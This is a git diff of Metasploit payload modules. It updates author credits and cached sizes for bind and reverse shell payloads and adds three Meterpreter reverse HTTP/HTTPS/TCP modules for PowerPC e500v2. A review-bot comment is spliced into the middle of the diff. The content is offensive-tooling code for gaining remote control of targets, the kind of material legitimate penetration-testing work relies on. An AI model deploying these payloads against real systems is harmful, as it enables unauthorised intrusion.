Msf::Payload::NodeJS diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index ecbb099b96..a0cfd2f733 100644 
--- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -18,7 +18,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via Perl)', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', - 'Author' => ['Samy ', 'cazz', 'patrick'], + 'Author' => ['Samy ', 'cazz', 'aushack'], 'License' => BSD_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index c7a9a583b6..20e475eb1c 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -18,7 +18,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via perl) IPv6', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', - 'Author' => ['Samy ', 'cazz', 'patrick'], + 'Author' => ['Samy ', 'cazz', 'aushack'], 'License' => BSD_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb index b677a24fef..83e3bc0f93 100644 --- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp' module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Single include Rex::Powershell::Command diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb index 2eb30f8fdd..48bcf2a81d 100644 --- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb 
@@ -10,7 +10,7 @@ require 'msf/core/handler/reverse_tcp_ssl' module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Single include Rex::Powershell::Command diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index 400d828bc1..accb73877a 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -18,7 +18,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Windows Command, Double Reverse TCP Connection (via Perl)', 'Description' => 'Creates an interactive shell via perl', - 'Author' => ['cazz', 'patrick'], + 'Author' => ['cazz', 'aushack'], 'License' => BSD_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 4fa8c97d53..d87445f832 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 7359 + CachedSize = 7544 include Msf::Payload::Single include Msf::Payload::Java diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 25b4b456e2..74c9255f11 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_AARCH64,
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
index 7f493ef8e9..b1c6ffcd4e 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
 module MetasploitModule
- CachedSize = 675112
+ CachedSize = 693880
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_AARCH64,
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
index 4c1b96f0db..d6818b4eb2 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
 module MetasploitModule
- CachedSize = 675112
+ CachedSize = 693880
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_AARCH64,
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
index 4fff3cf0a5..f44197a497 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 668392
+ CachedSize = 682608
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ARMBE,
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
index d1e889a621..6341bee2ae 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 668392
+ CachedSize = 682608
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ARMBE,
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
index 7ac0601213..634b6560ef 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 668392
+ CachedSize = 682608
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ARMBE,
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
index 5da3516adf..cf5d0c6be7 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 666984
+ CachedSize = 682608
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ARMLE,
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
index 976d22b3d0..ed339b08b0 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 666984
+ CachedSize = 682608
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ARMLE,
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
index 866d3a0e5c..50080e27d1 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 666984
+ CachedSize = 682608
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ARMLE,
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
index 8e5a81046a..5d755982a8 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1059368
+ CachedSize = 1081096
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPS64,
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
index 01618c62b5..d38aa97904 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1059368
+ CachedSize = 1081096
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPS64,
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
index 65778b0f92..ea96d086d2 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1059368
+ CachedSize = 1081096
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPS64,
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
index ee78530672..8ab191d710 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 1037512
+ CachedSize = 1058488
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSBE,
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
index 05b53aa7ba..b3aa33d864 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 1037512
+ CachedSize = 1058488
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSBE,
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
index bc38d4a374..fce512c439 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 1037512
+ CachedSize = 1058488
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSBE,
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
index 92ad4f9c77..35b4a3ada0 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 1036808
+ CachedSize = 1058584
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSLE,
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
index 27e5989778..e92e5319f3 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 1036808
+ CachedSize = 1058584
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSLE,
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
index 66cdd82b24..ab9bbd211b 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 1036808
+ CachedSize = 1058584
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSLE,
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
index 7c3d17f612..684af558e5 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
 module MetasploitModule
- CachedSize = 789196
+ CachedSize = 856196
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC,
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
index 2edd9d4421..92fad1845a 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
 module MetasploitModule
- CachedSize = 789196
+ CachedSize = 856196
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC,
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
index fe8cbdd08a..5a607842fd 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
 module MetasploitModule
- CachedSize = 789196
+ CachedSize = 856196
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC,
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
index 94dbd28258..20d3b4aa74 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
 module MetasploitModule
- CachedSize = 855928
+ CachedSize = 857808
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC64LE,
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
index 353b7ccf37..d0fed27439 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
 module MetasploitModule
- CachedSize = 855928
+ CachedSize = 857808
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC64LE,
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
index 48c3abe40b..5c649a25c9 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
 module MetasploitModule
- CachedSize = 855928
+ CachedSize = 857808
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC64LE,
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb
new file mode 100644
index 0000000000..679a3765fc
--- /dev/null
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb
@@ -0,0 +1,46 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppce500v2_linux'
+
+module MetasploitModule
+
+ CachedSize = 856196
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook ',
+ 'timwr'
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_PPCE500V2,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'http',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..f33ddf8cbb
--- /dev/null
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
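Review bot: `CachedSize = 856196` in the new ppce500v2 module is the same value this commit sets for the three ppc modules, which suggests it was copied rather than measured against the `powerpc-e500v2-linux-musl` build that `generate` actually requests; if the real binary differs in size, the framework's cached-size check will flag the module, so the constant should be regenerated with the cached-size update tooling. The same value recurs in the reverse_https and reverse_tcp files for ppce500v2 added in the next two hunks, so one regeneration pass covers all three. `ARCH_PPCE500V2` and `Msf::Sessions::Meterpreter_ppce500v2_Linux` are referenced but not defined in any hunk visible here; presumably they are added elsewhere in this commit, otherwise the module will fail to load. A one-line comment above the constant, `# Regenerate after every metasploit_payloads-mettle bump; checked by the cached-size spec`, would make the maintenance rule explicit for the next version bump.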
@@ -0,0 +1,46 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppce500v2_linux'
+
+module MetasploitModule
+
+ CachedSize = 856196
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook ',
+ 'timwr'
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_PPCE500V2,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'https',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
new file mode 100644
index 0000000000..21eb56cde1
--- /dev/null
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
@@ -0,0 +1,46 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppce500v2_linux'
+
+module MetasploitModule
+
+ CachedSize = 856196
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse TCP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook ',
+ 'timwr'
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_PPCE500V2,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'tcp',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
index c8ec4d34ba..0fb3aaea5e 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 729184
+ CachedSize = 746944
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
